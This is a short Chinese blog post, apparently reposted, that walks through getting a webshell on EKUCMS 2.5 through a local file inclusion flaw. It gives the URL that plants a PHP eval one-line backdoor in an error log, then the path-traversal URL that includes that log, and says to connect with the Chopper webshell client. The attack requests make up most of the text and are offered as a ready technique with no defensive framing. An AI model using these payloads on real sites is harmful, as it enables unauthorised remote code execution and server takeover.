码迷,mamicode.com
首页 > 系统相关 > 详细

易酷cms本地包含漏洞拿shell

时间:2017-12-02 17:41:25      阅读:192      评论:0      收藏:0      [点我收藏+]

标签:eva   规则   测试   eval   版本   shell   src   分享图片   blog   

测试版本:易酷cms2.5

包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])}

技术分享图片

会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日

技术分享图片

错误日志内容

技术分享图片

包含错误日志,地址:http://localhost/ekucms2.5/?s=my/show/id/\..\temp\logs\17_12_02.log

技术分享图片

 直接用菜刀连接

技术分享图片

连接成功

技术分享图片

 

易酷cms本地包含漏洞拿shell

标签:eva   规则   测试   eval   版本   shell   src   分享图片   blog   

原文地址:http://www.cnblogs.com/sch01ar/p/7954539.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!